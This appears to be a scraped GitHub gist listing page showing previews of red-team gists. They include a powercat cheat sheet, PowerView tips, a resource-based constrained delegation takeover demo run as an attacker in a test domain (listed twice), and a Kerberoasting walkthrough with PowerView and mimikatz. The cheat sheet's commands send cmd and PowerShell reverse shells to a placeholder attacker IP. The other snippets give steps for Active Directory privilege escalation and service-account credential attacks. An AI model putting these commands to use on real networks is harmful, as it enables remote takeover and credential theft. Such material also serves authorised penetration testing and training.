- Slides
- Video
Stuart McMurray:
iansecretario
/ bsidesdc2019.md
Created
May 4, 2021 06:59
— forked from magisterquis/bsidesdc2019.md
iansecretario
/ powercat-cheatsheet.txt
Created
April 10, 2020 17:55
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Serve a cmd Shell: | |
| powercat -l -p 443 -e cmd | |
| Send a cmd Shell: | |
| powercat -c <REPLACE IP ADDRESS> -p 443 -e cmd | |
| Send a powershell: | |
| powercat -c <REPLACE IP ADDRESS> -p 443 -ep | |
| Send a powershell UDP: | |
| powercat -c <REPLACE IP ADDRESS> -p 443 -ep -u | |
| TCP Listener to TCP Client Relay: | |
| powercat -l -p 8000 -r tcp:<REPLACE IP ADDRESS>6:443 |
iansecretario
/ PowerView-3.0-tricks.ps1
Created
April 10, 2020 17:34
— forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
iansecretario
/ rbcd_demo.ps1
Created
April 10, 2020 17:33
— forked from HarmJ0y/rbcd_demo.ps1
Resource-based constrained delegation computer DACL takeover demo
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # import the necessary toolsets | |
| Import-Module .\powermad.ps1 | |
| Import-Module .\powerview.ps1 | |
| # we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
| whoami | |
| # the target computer object we're taking over | |
| $TargetComputer = "primary.testlab.local" |
iansecretario
/ rbcd_demo.ps1
Created
April 10, 2020 17:33
— forked from HarmJ0y/rbcd_demo.ps1
Resource-based constrained delegation computer DACL takeover demo
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # import the necessary toolsets | |
| Import-Module .\powermad.ps1 | |
| Import-Module .\powerview.ps1 | |
| # we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
| whoami | |
| # the target computer object we're taking over | |
| $TargetComputer = "primary.testlab.local" |
iansecretario
/ T1208-Kerberoasting.ps1
Last active
April 10, 2020 17:53
T1208 Kerberoasting with Powerview & mimikatz
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 101 Kerberoasting Powerview & Mimikatz | |
| 1. Look for a service that is running with user account and take note of the "ServicePrincipalName" | |
| Get-NetUser -SPN | |
| Samnple Output : | |
| <---Guidem snip---> | |
| serviceprincipalname : MSSQLSvc/guidem.kingdom.local < look for this | |
| givenname : guidemsql | |
| lastlogon : 4/6/2020 12:38:15 AM |